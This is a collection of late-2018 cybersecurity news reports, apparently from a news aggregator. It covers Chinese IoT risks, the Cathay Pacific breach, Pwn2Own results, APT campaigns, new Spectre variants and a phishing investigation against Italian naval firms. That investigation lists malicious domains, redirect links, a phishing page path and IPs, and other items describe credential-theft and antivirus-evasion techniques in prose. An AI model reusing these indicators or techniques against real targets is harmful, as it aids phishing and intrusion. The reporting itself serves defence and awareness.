The U.S. also has had long-running concerns about state-backed cyber theft of corporate secrets, something that China agreed to stop in 2015. But the bipartisan commission highlights the potential security risks to the United States by China's pre-eminence in the so-called internet of things, or IoT, which refers to the proliferation of physical devices that have sensors that collect and share data and connect to the internet. Such devices could be everything from household appliances like refrigerators and air conditioners to warehouse delivery systems, smart traffic signs and aerial drones.
"The scale of Chinese state support for the IoT, the close supply chain integration between the United States and China, and China's role as an economic and military competitor to the United States creates enormous economic, security, supply chain, and data privacy risks for the United States," the report says.
The commission, which does not set policy but can make recommendations to Congress and the U.S. administration, is warning that the potential impact of malicious cyberattacks through such systems will intensify with the adoption of ultra-fast 5G networks that could quicken data speeds by up to 100 times.
"The lax security protections and universal connectivity of IoT devices creates numerous points of vulnerability that hackers or malicious state actors can exploit to hold U.S. critical infrastructure, businesses, and individuals at risk," the report says.
The United States has already taken some steps to restrict the use of Chinese-made high technology. For example, it has restricted government procurement from Chinese tech giants Huawei and ZTE, which deny their products are used for spying by China's authoritarian government.
In June, the Defense Department suspended the purchase of all commercial, off-the-shelf drones until a cybersecurity risk assessment strategy was established. In 2017, U.S. customs authorities alleged that drones produced by Chinese company DJI, which has dominated the U.S. and Canadian drone markets, likely provided China with access to U.S. critical infrastructure and law enforcement data. DJI denied the allegation.
The commission is calling for Congress to push for assessments by U.S. government agencies on their supply chain vulnerabilities. It says the U.S. government depends on commercial, off-the-shelf products, many of them made in China, for more than 95 percent of its electronics components and information technology systems.
Large U.S. telecommunications providers also rely on global supply chains dominated by Chinese manufacturers. Although they do not source directly from Huawei and ZTE, major U.S. telecommunications providers rely on other foreign 5G network equipment suppliers that incorporate Chinese manufacturing in their supply chains, the report says.
Cathay Apologizes Over Data Breach but Denies Cover-up
15.11.2018 securityweek Incindent
The top two executives at Hong Kong carrier Cathay Pacific on Wednesday apologized for the firm's handling of the world's biggest airline hack that saw millions of customers' data breached but denied trying to cover it up.
The CEO and chairman also said the crisis "was one of the most serious" in the embattled firm's history and would act differently in a similar situation in future.
The pair were summoned to the city's legislative council to explain to lawmakers why it had taken five months to admit it had been hacked and the data of 9.4 million customers compromised, including passport numbers and credit card details.
Lawmakers slammed the delay as a "blatant attempt" to cover up the incident and thereby deprive customers of months of opportunities to take steps to safeguard their personal data.
However, chairman John Slosar said: "I'd like to make it absolutely clear that there was never any attempt to cover anything up."
He added: "I see it as one of the most serious crises that our airline has ever faced."
Earlier he had read a statement to LegCo in which he said: "I must personally apologise directly to you and the people of Hong Kong."
It emerged this week that the breach was the result of a sustained cyber attack for three months.
The airline had discovered suspicious activity on its network in March and confirmed unauthorised access to certain personal data in early May but did not make it public until October 24.
CEO Rupert Hogg explained the company needed time to establish the nature of attacks, contain the problem and identify stolen data, but said it "did regret the length of time" it took.
"We've learnt a lot of lessons from trying to do what we believe was right, which was to get accurate information about our customers, make sure that we knew what information pertained to them. We would do it a different way tomorrow indeed," Hogg said.
When pressed by lawmaker Kwok Ka-ki on whether Cathay would report to its customers immediately if there was another leak, Slosar said: "We will report instantly, yes."
Slosar also told lawmakers that the data breach issue was of great public interest but the information was not material or price sensitive.
The airline has contacted the customers affected.
The firm is already battling to stem major losses as it comes under pressure from lower-cost Chinese carriers and Middle East rivals.
It booked its first back-to-back annual loss in its seven-decade history in March and has previously pledged to cut 600 staff including a quarter of its management as part of its biggest overhaul in years.
Hong Kong-listed shares in the firm ended up 2.25 percent at HK$10.90.
iPhone X Exploits Earn Hackers Over $100,000
15.11.2018 securityweek Congress
The Zero Day Initiative’s Pwn2Own Tokyo hacking competition has come to an end, with participants earning over $300,000 for disclosing vulnerabilities affecting iPhone X, Xiaomi Mi 6 and Samsung Galaxy S9 smartphones.
After on the first day participants received $225,000 for demonstrating zero-day exploit chains against the iPhone X, Samsung Galaxy S9 and Xiaomi Mi 6, on the second day only $100,000 was paid out by organizers for one iPhone and two Xiaomi hacks.
Team Fluoroacetate, made up of Amat Cama and Richard Zhu, started the day by hacking an iPhone X using a Just-In-Time (JIT) bug and an out-of-bounds access flaw. The vulnerabilities allowed them to exfiltrate data from the device, which earned them $50,000. During their demo, the researchers showed how they could steal a previously deleted photo from the targeted device.
The same team also attempted to demonstrate a baseband exploit targeting the iPhone X, which would have been a first, but they failed to get their exploit chain to work within the allotted time.
F-Secure’s MWR Labs team also failed to hack the iPhone – the team targeted the browser – but they did show some interesting vulnerabilities that were purchased by ZDI through its standard program.
Both the MWR Labs and the Fluoroacetate teams managed to hack the Xiaomi Mi 6 browser, each exploit chain earning them $25,000.Pwn2Own Tokyo 2018 winners
Team Fluoroacetate received the highest number of Master of Pwn points, which earned them 65,000 ZDI reward points worth roughly $25,000.
All vulnerabilities have been reported to their respective vendors and they will likely be patched in the upcoming days or weeks.
Of the total of $325,000 paid out at Pwn2Own Tokyo for 18 zero-days, $110,000 was for iPhone X exploits. These are serious vulnerabilities that can allow malicious actors to take control of a phone via its browser or Wi-Fi.
While rewards at Pwn2Own are usually significantly higher than in regular bug bounty programs, many industry professionals will likely still argue that such vulnerabilities are worth much more on the black and grey markets. For example, exploit acquisition firm Zerodium offers up to $100,000 for a WiFi-based remote code execution and local privilege escalation exploit on Apple’s iOS. A remote jailbreak with persistence is worth as much as $1.5 million for the company.
This was the first Pwn2Own competition that covered IoT devices, but no one has attempted such hacks. Other devices not targeted this year are the Huawei P20 and the Google Pixel 2.
Chinese TEMP.Periscope cyberespionage group was using TTPs associated with Russian APTs
15.11.2018 securityaffairs CyberSpy
Chinese TEMP.Periscope cyberespionage group targeted a UK-based engineering company using TTPs associated with Russia-linked APT groups.
Attribution of cyber attacks is always a hard task, in many cases attackers use false flags to masquerade their identities.
Chinese hackers have targeted a UK-based engineering company using techniques and artifacts attributed to the Russia-linked APT groups Dragonfly and APT28, according to security researchers.
Threat intelligence experts from Recorded Future discovered that Chinese threat actor TEMP.Periscope was using TTPs associated with Russian APT groups in the attempt to make hard the attribution. The same campaign that targeted the U.K.-based engineering company also hit a freelance journalist based in Cambodia, attackers used a command and control infrastructure that was used in the past by the TEMP.Periscope APT group.
“Employees of a U.K.-based engineering company were among the targeted victims of a spearphishing campaign in early July 2018. The campaign also targeted an email address possibly belonging to a freelance journalist based in Cambodia who covers Cambodian politics, human rights, and Chinese development.” reads the analysis published by Recorded Future.
“We believe both attacks used the same infrastructure as a reported campaign by Chinese threat actor TEMP.Periscope (also known as Leviathan), which targeted Cambodian entities in the run-up to their July 2018 elections. Crucially, TEMP.Periscope’s interest in the U.K. engineering company they targeted dates back to attempted intrusions in May 2017.”
The attackers used the domain scsnewstoday[.]com as C2, the same that was used in a recent TEMP.Periscope campaign targeting the Cambodian government.
The spear-phishing messages were sent by using the popular Chinese email client, Foxmail.
It is interesting to note that attackers employed a unique technique used in the past by Dragonfly APT group in attacks aimed at critical infrastructure. The attackers used a “file://” path in the in the spearphish calling out to a malicious C2 to steal SMB credentials.
“A unique technique documented as a Dragonfly TTP in targeting critical infrastructure was used in the attack. The technique attempts to acquire SMB credentials using a “file://” path in the spearphish calling out to a malicious C2.” continues the analysis.
“The attack probably made use of a version of the open source tool Responder as an NBT-NS poisoner. APT28 used Responder in attacks against travelers staying at hotels in 2017.”
The same UK engineering company was already targeted by TEMP.Periscope in a May 2017, months later the hackers also hit the US engineering and academic entities.
“Recorded Future expects TEMP.Periscope to continue to target organisations in the high-tech defence and engineering sectors,” concludes the report.
“The Chinese strategic requirement to develop advanced technology, particularly in marine engineering, remains an intense focus as China looks to dominate the South China Sea territory.”
“We believe TEMP.Periscope will continue to use commodity malware because it is still broadly successful and relatively low cost for them to use. They will continue to observe ‘trending’ vulnerabilities to exploit and use techniques that have been publicly reported in order to gain access to victim networks.”
“We have to understand and tackle the underlying economic ecosystem that enables, funds and supports criminal activity on a global scale to stem the tide and better protect ourselves. By better understanding the systems that support cyber-crime, the security community can better understand how to disrupt and stop them.”
Senior German officials wants exclude Chinese firms from building 5G infrastructure
15.11.2018 securityaffairs IT
Senior German officials are making pressure on the government to exclude Chinese firms from building the country’s 5G infrastructure.
Many countries are going to build 5G infrastructure, but the approach of the government is completely different. Italian politicians seem to completely ignore the importance of 5G infrastructure for the growth of the country and the potential effects on national security, while senior German officials are planning to exclude Chinese firms such as Huawei from the tender because worried of potential compromise of national security.
Germany is not the first country to ban Chinese firms from the 5G auction, Australia and the US already announced the same decision.
“There is serious concern. If it were up to me we would do what the Australians are doing,” one senior German official involved in the internal 5G debate in Berlin told Reuters.
Officials in the German foreign and interior ministries were informed by Australian and American peers of the risks of using Chinese suppliers like Huawei in 5G infrastructure.
A heated debate is growing in the country and experts fear that this could cause a delay in the implementation of the infrastructure that is planned for 2019.
Officials fear possible interference of the Chinese intelligence that is also allowed under China’s National Intelligence Law, approved in 2017, which states that Chinese “organisations and citizens shall, in accordance with the law, support, cooperate with, and collaborate in national intelligence work”.
Experts believe that companies like Huawei could support the Chinese government in cyber espionage activities or that Chinese intelligence may be able to compromise Huawei’s equipment.
“Cyber security has always been our top priority and we have a proven track record of providing secure products and solutions for our customers in Germany and around the world,” A Huawei spokesman told Reuters.
Huawei believes that the decision to ban it from 5G auctions is “politically motivated” and based on a “mistaken and narrow understanding” of Chinese law.
“Last week, after The Australian newspaper published a story saying Huawei staffers had been used by Chinese intelligence to obtain access codes to infiltrate a foreign network, the company denied that it had ever “provided or been asked to provide customer information for any government or organisation”.” added the Reuters.
“Following Australia’s decision to exclude the Chinese from their 5G network, there is huge angst at Huawei,” said a senior industry official who requested anonymity because of the sensitivity of the issue.
“They fear a domino effect. If it stops with Australia it is not such a big deal. But if it continues it’s serious. A 5G setback in Germany could ripple across Europe.”
Pwn2Own Tokyo 2018 – iPhone X exploits paid over $100,000
15.11.2018 securityaffairs Congress
The Zero Day Initiative’s Pwn2Own Tokyo 2018 is a success, participants earned over $300,000 for disclosing flaws affecting iPhone X, Xiaomi Mi 6 and Samsung Galaxy S9 smartphones.
During the first day of the Pwn2Own Tokyo 2018 contest, participants hacked Apple iPhone X, Samsung Galaxy S9 and Xiaomi Mi 6 devices earning more than $225,000.
The novelty for this Pwn2Own edition was the creation of a specific session for IoT devices.
On the second day, the organizers only paid $100,000 for one iPhone and two Xiaomi hacks.
The day began with the success of the Team Fluoroacetate composed of Amat Cama and Richard Zhu, who hacked an iPhone X exploiting a Just-In-Time (JIT) bug and an out-of-bounds access flaw.
The team received $50,000 to have exfiltrate data from the device, they successfully stole a previously deleted photo from the targeted device.
They earned $25,000 USD and 6 Master of Pwn points.
F-Secure’s MWR Labs (Georgi Geshev, Fabi Beterke, and Rob Miller) also failed in hacking the iPhone X in the browser category, they were not able to use their exploit chain within the allotted time.
LaterMWR Labs hacked the Xiaomi Mi6 in the browser category using a download bug along with a silent app installation to load their custom app and exfiltrate pictures.
They earned another $25,000 USD and 6 more Master of Pwn points.
The organizers reported the flaws to their respective vendors, they paid out a total of $325,000 for 18 zero-days, $110,000 was for iPhone X exploits.
The flaws could be used by a persistent attacker or a surveillance firm to compromise the target device via its browser or Wi-Fi, their value is much greater in the cybercrime underground.
“Overall, we awarded $325,000 USD total over the two day contest purchasing 18 0-day exploits. Onsite vendors have received the details of these bugs and now have 90 days to produce security patches to address the bugs we reported. Once these are made public, stay tuned to this blog for more details about some of the best and most interesting bugs we saw this week.” concludes the official page for the Pwn2Own Tokyo 2018.
Kaspersky revealed that the CVE-2018-8589 Windows 0-day fixed by Microsoft Nov. 2018 Patch Tuesday has been exploited by at least one APT group in attacks in the Middle East.
Kaspersky Lab experts revealed that the CVE-2018-8589 Windows zero-day vulnerability addressed by Microsoft November 2018 Patch Tuesday has been exploited by an APT group in targeted attacks against entities in the Middle East.
Kaspersky reported the flaw to Microsoft on October 17, the security firm observed attacks against systems protected by its solution and attempting to exploit the zero-day flaw affecting the Win32k component in Windows.
The flaw could be exploited by an authenticated attacker to execute arbitrary code in the context of the local user, it ties the way Windows handles calls to Win32k.sys.
Kaspersky Lab described the CVE-2018-8589 flaw as a race condition in win32k!xxxMoveWindow that is caused by the improper locking of messages sent synchronously between threads.
The CVE-2018-8589 vulnerability only affects Windows 7 and Windows Server 2008.
Attackers exploited the flaw as the first stage of a malware installer aimed at a limited number of entities in the Middle East.
At the time of writing it is not unclear how the malware had been delivered by the threat actors.
“The exploit was executed by the first stage of a malware installer in order to gain the necessary privileges for persistence on the victim’s system. So far, we have detected a very limited number of attacks using this vulnerability. The victims are located in the Middle East.” reads the analysis published by Kaspersky.
Kaspersky did not explicitly attribute the attack to a specific threat actor but pointed out that the CVE-2018-8589 exploit code is being used by at least one cyber espionage APT group.
In October, Kaspersky also reported to Microsoft the CVE-2018-8453 flaw that had been exploited by the threat group known as FruityArmor in a highly targeted campaign.
the FruityArmor APT group is active at least since 2016 when targeted activists, researchers, and individuals related to government organizations.
In October, the cyber espionage group exploited a Windows zero-day flaw in attacks aimed at entities in the Middle East.
Researchers pointed out that both issues affect the Win32k component and both flaws were used in attacks aimed at users in the Middle East, but Kaspersky did not link the two attacks.
Boffins discovered seven new Meltdown and Spectre attacks
15.11.2018 securityaffairs Attack
Researchers who devised the original Meltdown and Spectre attacks disclosed seven new variants that leverage on a technique known as transient execution.
In January, white hackers from Google Project Zero disclosed the vulnerabilities that potentially impact all major CPUs, including the ones manufactured by AMD, ARM, and Intel.
The expert devised two attacks dubbed Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753 and CVE-2017-5715), which could be conducted to sensitive data processed by the CPU.
The Meltdown attack could allow attackers to read the entire physical memory of the target machines stealing credentials, personal information, and more.
Both attacks leverage the “speculative execution” technique used by most modern CPUs to optimize performance.
In the following months, experts discovered many other attacks leveraging the speculative execution technique, such as Spectre-NG, NetSpectre, SpectreRSB, Spectre 1.1, Spectre1.2, Lazy FP, and Foreshadow.
Now, researchers from Graz University of Technology, imec-DistriNet, KU Leuven, and
College of William and Mary along with some of the experts who devised the original Meltdown and Spectre attacks have disclosed seven new variants that leverage on a technique known as transient execution.
“Modern processor optimizations such as branch prediction and out-of-order execution are crucial for performance. Recent research on transient execution attacks including Spectre and Meltdown showed, however, that exception or branch misprediction events may leave secret-dependent traces in the CPU’s microarchitectural state.” reads the research paper titled “A Systematic Evaluation of Transient Execution Attacks and Defenses.”
“This observation led to a proliferation of new Spectre and Meltdown attack variants and even more ad-hoc defenses (e.g., microcode and software patches).”
The new transient execution attacks affect Intel, AMD, ARM processors, the good news is that some of them are mitigated by mitigations implemented for Spectre and Meltdown.
“Transient execution attacks leak otherwise inaccessible information via the CPU’s microarchitectural state from instructions which are never committed,” continues the paper.
“We also systematically evaluated all defenses, discovering that some transient execution attacks are not successfully mitigated by the rolled out patches and others are not mitigated because they have been overlooked.”
Below a list of short descriptions of the newly discovered attacks, two are Meltdown variants, remaining are Spectre attacks.
Meltdown-PK (Protection Key Bypass)— Meltdown-PK attack allows to bypass both read and write isolation guarantees enforced through memory-protection keys. PKU isolation can be bypassed if an attacker has code execution in the containing process, even if the attacker cannot execute the wrpkru instruction (e.g., due to blacklisting).
Meltdown-BR (Bounds Check Bypass)—x86 processors come with dedicated hardware instructions that raise a bound range exceeded exception (#BR) when encountering out-of-bound array indices. The Meltdown-BR attack which exploits transient execution following a #BR exception
to encode out-of-bounds secrets that are never architecturally visible.
Spectre-PHT (Pattern History Table)
Spectre-PHT-CA-OP (Cross-Address-space Out of Place)—Performing previously disclosed Spectre-PHT attacks within an attacker-controlled address space at a congruent address to the victim branch.
Spectre-PHT-SA-IP (Same Address-space In Place)—Performing Spectre-PHT attacks within the same address space and the same branch location that is later on exploited.
Spectre-PHT-SA-OP (Same Address-space Out of Place)—Performing Spectre-PHT attacks within the same address space with a different branch.
Spectre-BTB (Branch Target Buffer)
Spectre-BTB-SA-IP (Same Address-space In Place)—Performing Spectre-BTB attacks within the same address space and the same branch location that is later on exploited.
Spectre-BTB-SA-OP (Same Address-space Out of Place)—Performing Spectre-BTB attacks within the same address space with a different branch.
Researchers detailed proof-of-concept attacks against processors from Intel, ARM, and AMD, they responsibly disclosed their findings to the chip makers. Intel and ARM already acknowledged the report and are working to address the issues, for this reason, they opted to hold their proof-of-concept exploits waiting for a fix from the vendors.
ARM explained that the Spectre and Meltdown vulnerabilities can be addressed by applying existing mitigations described in a previously released white paper.
The ‘MartyMcFly’ investigation: Italian naval industry under attack
15.11.2018 securityaffairs Virus
Experts at Yoroi’s Cyber Security Defence Center along with Fincantieri’s security team investigated the recently discovered Martymcfly malware attacks.
On October 17th we disclosed the ‘MartyMcFly’ Threat (Rif. Analysis) where unknown attackers were targeting Italian naval industries. The analysis was cited by Kaspersky’s ICS CERT who exposed a wider threat extension across multiple countries such as: Germany, Spain, and India. Thanks to Kaspersky’s extended analysis we decided to harvest more indicators and to check more related threats by asking a joint cyber force with Fincantieri, one of the biggest player on Naval Industry across Europe. Fincantieri who was not involved in the previous ‘MartyMcFly’ attack identified and blocked additional threats targeting their wide infrastructure intercepted on during the week of 20th August 2018, about a couple of months before the ‘MartyMcFly’ campaign. Our task was to figure out if there were a correlation between those attacks targeting Italian Naval Industries and try to identify a possible attribution.
Fincantieri’s security team shared with us a copy of a malicious email, carefully themed as the ones intercepted by the Yoroi’s Cyber Security Defence Center between 9th and 15th October. At first look the message appears suspicious due to inconsistent sender’s domain data inside the SMTP headers:
Subject: Quotation on Marine Engine & TC Complete
User-Agent: Horde Application Framework 5
The email messages have been sent from a mailbox related to the “jakconstruct.com” domain name, which is owned by the Qatari’s “AK CONSTRUCTION W.L.L.”, suggesting a possible abuse of their email infrastructure.
Figure 1. SMTP header smtp details
The “anchors-chain.com” domain found in the SMTP “From” header has been purchased a few weeks before the delivery of the malicious message: a privacy-protected user registered the domain on 21 June 2018, through the “NameSilo, LLC” provider.
Figure 2. Whois data of “anchors-chain.com”
During the time period between the 22nd of June and the 2nd of September 2018, this domain resolved to the IP address 220.127.116.11, owned by “Fast Serv Inc.”, hosting provider sometimes abused for illicit purposes (e.g. command and control services of info stealers malware). Unfortunately, the domain results offline at the time of writing, so it wasn’t possible to assess the presence of redirections to legit services as an observer on the “MartyMcFly” case.
Also, the “anchors-chain.com” domain shows an explicit reference to an Asian company producing chains for a wide range of customers in the shipbuilding industry: the “Asian Star Anchor Chain Co. Ltd.” or “AsAc Group”. The real domain of the group spells almost the same: “anchor-chain.com”, the letter “s” is the only difference between the name registered by the attacker and the legit one. Moreover, the message body has been written in Chinese language and the signature includes a link to another legit domain of the group, confirming the attacker was trying to impersonate personnel from AsAc Group, simulating the transmission of quotations and price lists.
Figure 4. Malicious email message
Figure 5. Malicious PDF document
The link “http://ow.ly/laqJ30lt4Ou“ has been deactivated for “spam” issues and is no longer available at the time of writing. However, analyzing automated sandox report dated back to the attack time-period is possible to partially reconstruct the dynamics of the payload execution, since the click on the embedded “ow.ly” link.
Figure 6. Attachment’s process tree
The dynamic trace recorded some network activity directed to two suspicious domains on the “.usa.cc” TLD originated right after the launch of the “iexplore.exe” browser’s process: respectively “wvpznpgahbtoobu.usa.cc” and “xtyenvunqaxqzrm.usa.cc”.
Figure 7. DNS requests intercepted
The first network interaction recorded is related to the embedded link inside the pdf attachment “http://ow.ly/laqJ30lt4Ou”, returning a redirection to another resource protected by the same URL shortening service.
Figure 8. Redirection to the second ow.ly url
The opening of the next url “http://ow.ly/Kzr430lt4NV” obtains another HTTP 301 redirect to an HTTPS resource related to one of the previously identified “usa.cc” domain:
Figure 9. Redirection to “wvpznpgahbtoobu.usa.cc”
Analyzing the SSL/TLS traffic intercepted during the dynamic analysis session shows multiple connections to the ip address 18.104.22.168, a dedicated server hosted by OVH SAS. The SSL certificate has been released by the “cPanel, Inc“ CA and is valid since 16th August 2018; this encryption certificate is likely related to the previously discussed HTTP 301 redirection due to the common name “CN=wvpznpgahbtoobu.usa.cc” found in the Issuer field.
Figure 10. SSL Certificate details “wvpznpgahbtoobu.usa.cc”
Another SSL/TLS connections recorded shows traffic related to the “xtyenvunqaxqzrm.usa.cc” domain directed to the same 22.214.171.124 ip address:
Figure 11. SSL Certificate details “xtyenvunqaxqzrm.usa.cc”
OSINT investigations gathered evidence of past abuses of the “xtyenvunqaxqzrm.usa.cc” for malicious purposes, for instance an urlquery report dated back on 23rd August 2018 shows a phishing portal previously reachable at “https://xtyenvunqaxqzrm .usa.cc/maesklines/Maerskline/maer.php” contained a login page of a fake “Maersk” holding’s shipping portal, multinational company operating in the logistics sector, one of the world’s largest container shipping company.
Figure 12. Phishing page previously hosted on xtyenvunqaxqzrm.usa.cc
The elements found in the dynamic execution report indicates a compatibility between the OSINT information about the “xtyenvunqaxqzrm.usa.cc” domain and the attachment itself: one of the dropped file recorded during the automated analysis section is named “login.html” and it has been classified as phishing template on the VT platform (hash 4cd270fd943448d595bfd6b0b638ad10).
Figure 13. login.html page dropped during the execution
The evidence collected during the joint analysis with the Fincantieri’s security team suggests some, still unspecified, targeted threat is likely trying to establish a foothold at least into the Italian naval industry. At this time is not possible to confirm the two waves of attack have been planned and executed by the same threat actor of the “MartyMcFly” campaign, many differences such as the distinct type of payload are relevant. However, at the same time, common elements impose to not discard the possibility of this relationship, for example, the following indicators are likely suggesting correlations:
impersonification of the service provider and satellite companies of the naval industry sector.
usage of domain names carefully selected to appear similar to legit names of known companies.
usage of professional sounding emails containing reference and documents carefully aligned with impersonification context.
possible usage of “Microsoft Word 2013”
Having said that we would like to thanks colleagues of Fincantieri’s security team for sharing data about these attacks, helping us in the investigation of this threat.
APT Group Uses Windows Zero-Day in Middle East Attacks
14.11.2018 securityweek APT
A Windows zero-day vulnerability addressed this week by Microsoft with its November 2018 Patch Tuesday updates has been exploited by an advanced persistent threat (APT) group in attacks aimed at entities in the Middle East.
Microsoft learned about the vulnerability on October 17 from Kaspersky Labs. The security firm came across the flaw after one of its products detected an exploitation attempt against a Windows system. Further analysis revealed that it was a zero-day vulnerability related to the Win32k component in Windows.
The security hole, tracked as CVE-2018-8589, allows an attacker to elevate privileges on a compromised Windows 7 or Windows Server 2008 system. In the attacks observed by Kaspersky, threat actors had been executing the exploit through the first stage of a malware installer, but it’s unclear how the malware had been delivered.
According to Kaspersky, the vulnerability has only been used in a “very limited number of attacks,” with all the victims located in Middle Eastern countries.
The company could not say which threat group may be behind these attacks, but noted that the exploit is being used by “at least one APT actor.”
Kaspersky has released a blog post containing technical details on CVE-2018-8589, which it has described as a race condition.
This is not the only zero-day reported by Kaspersky to Microsoft in recent weeks. The company’s researchers have also been credited for discovering CVE-2018-8453, which Microsoft resolved with its October updates. The security hole had been exploited by the threat group known as FruityArmor in a highly targeted campaign.
Both vulnerabilities identified by Kaspersky were related to the Win32k component of Windows and they were both used in attacks aimed at users in the Middle East, but it’s unclear if there is any connection between the two.
“Autumn 2018 became quite a hot season for zero-day vulnerabilites,” said Anton Ivanov, security expert at Kaspersky Lab. “In just a month, we discovered two of these threats and detected two series of attacks in one region. The discreteness of cyberthreat actors’ activities reminds us that it is of critical importance for companies to have in their possesion all the necessary tools and solutions that would be intelligent enough to protect them from such sophisticated threats. Otherwise, they could face complex targeted attacks that will seemingly come out of nowhere.”
Cloud Security Firm Netskope Raises $168.7 Million
14.11.2018 securityweek IT
Cloud security firm Netskope on Tuesday announced that it has raised $168.7 million in a Series F funding round, which brings the total raised by the company to date to over $400 million.
The latest funding round was led by Lightspeed Venture Partners with participation from Accel, Geodesic Capital, Iconiq Capital, Sapphire Ventures, Social Capital, and Base Partners, which is the only new investor.
Netskope says it will use the new funds to expand R&D and the global data center of its enterprise security cloud platform.Netskope raises $168 million
Founded in 2013, Netskope offers solutions designed to help organizations manage risk, protect data, and block threats by providing full visibility and control, data loss prevention (DLP), and threat protection capabilities for their web, SaaS, and IaaS assets.
Netskope recently opened a new headquarters and Santa Clara, California, as a result of a 50% increase in employee headcount. The company acquired Sift Security in July 2018.
“Simply put, without security transformation, digital transformation will fail,” said Sanjay Beri, founder and CEO of Netskope. “We have spent the last six years bringing the leading security cloud to enterprises to address this growing challenge as more and more companies embrace digital transformation. With this new round of funding, we are one step closer to helping all organizations match their security strategy with the pace of today’s cloud-first world.”
APT Simulation Provider XM Cyber Raises $22 Million
14.11.2018 securityweek APT
XM Cyber, an Israel-based company that provides an automated APT simulation and remediation platform, on Tuesday announced that it has raised $22 million in a Series A funding round.
Macquarie Capital, Nasdaq Ventures, Our Innovation Fund, UST Global and others participated in the funding round, which brings the total raised by XM Cyber to date to $32 million.
The startup says it plans on using the newly acquired funds to accelerate growth through expanded sales, engineering and marketing programs.
XM Cyber’s main product, the HaXM automated APT simulation platform, was unveiled in March. It simulates an attacker’s possible behavior in an effort to identify potential weaknesses, and uses that data to provide recommendations for remediation.
“We don't define the attack vectors in advance. We act like a virtual hacker,” XM Cyber VP of Product Adi Ashkenazy told SecurityWeek in March. “We start from points of likely breach – which could be internet-facing servers, for example; or endpoints that receive external email. We place our virtual hacker in those starting points with a tool box that mimics the capabilities of an advanced attacker; and from that moment on the virtual hacker mimics the steps taken by a real hacker trying to find his way to critical assets. We never know in advance what will be found, but so far the virtual hacker has always eventually managed to compromise the entire network.”
XM Cyber was founded in 2016 by a team of former members of Israeli security and intelligence services led by retired Mossad chief Tamir Pardo. The company has customers in Israel, the United States and Europe, including in the financial and critical infrastructure sectors.
“2018 has been an incredible year for XM Cyber, and this funding round will help us expand our footprint in 2019,” said XM Cyber CEO and Co-Founder Noam Erez. “We are grateful to our investors for this vote of confidence and look forward to their continued strong support.”
Sophisticated Cyberattack Targets Pakistani Military
14.11.2018 securityweek CyberWar
A previously undisclosed threat actor is targeting nuclear-armed government and military in Pakistan as part of a new, unusually complex espionage campaign, Cylance security researchers warn.
Dubbed "The White Company" by Cylance, the hackers are believed to be a state-sponsored group that has access to zero-day exploits and exploit developers, as well as the resources necessary to evolve, modify, and refine tools and malware.
As part of a year-long, ongoing campaign called Operation Shaheen, The White Company went to unusual lengths to ensure stealth, Cylance says. The actor was able to evade detection from Sophos, ESET, Kasperksy, BitDefender, Avira, Avast!, AVG, and Quick Heal tools.
“In this campaign, we watched them turn eight different antivirus products against their owners. Then, oddly, the White Company instructed their code to voluntarily surrender to detection,” the researchers said.
Not only are checks used to determine whether the malware runs on the proper system, but decoy documents are also used to reduce suspicion, and the malware can also delete itself. The actor used five different obfuscation (packing) techniques, additional system fingerprinting, and compromised or un-attributable infrastructure for command and control (C&C).
The first phase of the campaign employed a relatively dated exploit (for the CVE-2012-0158 vulnerability), publicly available remote access tools (RATs) - either be purchased or freely available -, and external infrastructure for delivery, namely compromised Pakistani websites, including that of Frontier Works Organization (FWO).
Starting in December 2017, the lure documents arrived with the malware embedded and attempted to exploit CVE-2015-1641. Highly obfuscated, the payload in this phase also allowed the threat actor to spy on and steal data from its targets and consisted of two separate stages.
The stage 1 shellcode is simply meant to prepare the system for the stage 2 shellcode, which includes mission-specific functions and which is likely authored by The White Company group themselves.
The exploit includes anti-analysis capabilities, checks whether any of eight specific antivirus products are present on the target machine and attempts to evade them, determines the current date, and drops the malware payload.
When the lure document is opened, the exploit launches a new session of Microsoft Word and displays a decoy document, but deletes itself from the system, so that it would not trigger a second time. The exploit uses the date check and the previously recorded list of antivirus products to stop the antivirus evasion and essentially surrender to each product, sequentially, over a period of six months.
The spying malware dropped in by stage 2 of phase 2 was found to be similar to the RATs delivered in Phase 1. They too were heavily obfuscated versions of publicly available Trojans, also modular in nature. The purpose of the malware was to record keystrokes, steal credentials, access microphone and camera, and access the desktop remotely.
“Once running, the malware in this campaign relied on a set of roughly half a dozen IP addresses that orchestrated so-called command and control. An analysis of those IPs and domains, including historical domain, DNS, and website registration research, provided no significant insight,” Cylance says.
However, given that one of the IP addresses is still active, Operation Shaheen is likely ongoing, the security researchers say. On the other hand, the security firm has not had visibility into the campaign since February 2018.
The threat actor went to great lengths to elude attribution, using tools from different developers and attempting to cover their tracks. However, the researchers believe The White Group hasn’t been previously documented, based on the use of complex shellcode and heavily obfuscated, publicly available malware.
Cathay Says 'Most Intense' Period of Data Breach Lasted Months
14.11.2018 securityweek Incindent
The world's biggest airline data breach, affecting millions of Cathay Pacific customers, was the result of a sustained cyber attack that lasted for three months, the carrier admitted, while insisting it was on alert for further intrusions.
The Hong Kong-based firm was subjected to continuous breaches that were at their "most intense" from March to May but continued after, it said in a written submission to the city's Legislative Council ahead of a panel hearing on Wednesday.
It also looked to explain why it took until October 24 to reveal that 9.4 million passengers had been affected, with hackers getting access to personal information including dates of birth, phone numbers and passport numbers.
Cathay said that while the number of successful attacks had diminished, it remained concerned as "new attacks could be mounted".
"Cathay is cognisant that changes in the cybersecurity threat landscape continue to evolve at pace as the sophistication of the attackers improves," it said.
"Our plans, which include growing our team of IT security specialists, will necessarily evolve in response to this challenging environment."
It explained in the statement that the nature of the attacks, enormous amount of investigative work and the process to identify stolen data contributed to the length of time between initial discovery and public disclosure.
It also said it was not until October 24 that it had completed the identification of the personal data that had been accessed.
Hong Kong-listed shares in the firm were up 0.57 percent in early afternoon trade.
The city's Privacy Commissioner for Personal Data said last week it was investigating the carrier over the hack and why it took so long to tell customers.
The airline admitted about 860,000 passport numbers, 245,000 Hong Kong identity card numbers, 403 expired credit card numbers and 27 credit card numbers with no card verification value (CVV) were accessed, but insisted that there was no evidence that personal data has been misused.
"No passenger’s travel or loyalty profile was accessed in full, and no passenger passwords were compromised," it said.
The company has apologized to passengers affected and said it was helping them to protect themselves.
The troubled airline is already battling to stem major losses as it comes under pressure from lower-cost Chinese carriers and Middle East rivals.
It booked its first back-to-back annual loss in its seven-decade history in March and has previously pledged to cut 600 staff including a quarter of its management as part of its biggest overhaul in years.
The Battle for Privacy in the United States is Just Beginning
The European Union has one primary over-arching data law that covers the entire EU (and reaches non-European countries that collect and store personal data on European citizens). The United States has historically taken a different approach to data laws – individual responses to specific concerns.
